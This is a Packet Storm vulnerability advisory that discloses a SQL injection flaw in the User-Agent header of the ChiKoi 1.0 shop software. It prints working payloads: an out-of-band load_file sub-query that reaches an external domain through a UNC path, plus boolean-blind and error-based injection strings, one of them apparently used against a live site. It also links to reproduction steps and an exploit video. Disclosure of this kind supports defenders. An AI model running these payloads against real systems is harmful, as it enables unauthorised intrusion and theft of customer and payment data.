Lucene search

K
packetstormNu11secur1tyPACKETSTORM:170484
HistoryJan 12, 2023 - 12:00 a.m.

ChiKoi 1.0 SQL Injection

2023-01-1200:00:00
nu11secur1ty
packetstormsecurity.com
181
chikoi 1.0
sql injection
user-agent header
data theft
user harm
`## Title: ChiKoi-1.0 SQLi  
## Author: nu11secur1ty  
## Date: 01.12.2023  
## Vendor: https://chikoiquan.tanhongit.com/  
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi  
  
## Description:  
The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.  
The payload '+(select  
load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'  
was submitted in the User-Agent HTTP header.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The attacker can steal all information from this system and can  
seriously harm the users of this system,  
such as extracting bank accounts through which they pay each other, etc.  
  
## STATUS: HIGH Vulnerability - CRITICAL  
  
[+] Payload:  
  
```MySQL  
---  
Parameter: User-Agent (User-Agent)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)  
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)  
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND  
9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION  
SELECT 6994) END))-- -  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)  
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND  
(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT  
(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR  
---  
```  
[+] Online:  
  
```MySQL  
---  
Parameter: User-Agent (User-Agent)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)  
Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)  
Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND  
8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNION  
SELECT 6426) END))-- -  
---  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)  
  
## Proof and Exploit:  
[href](https://streamable.com/7x69yz)  
  
## Time spent  
`01:30:00`  
  
## Writing an exploit  
`00:05:00`  
  
`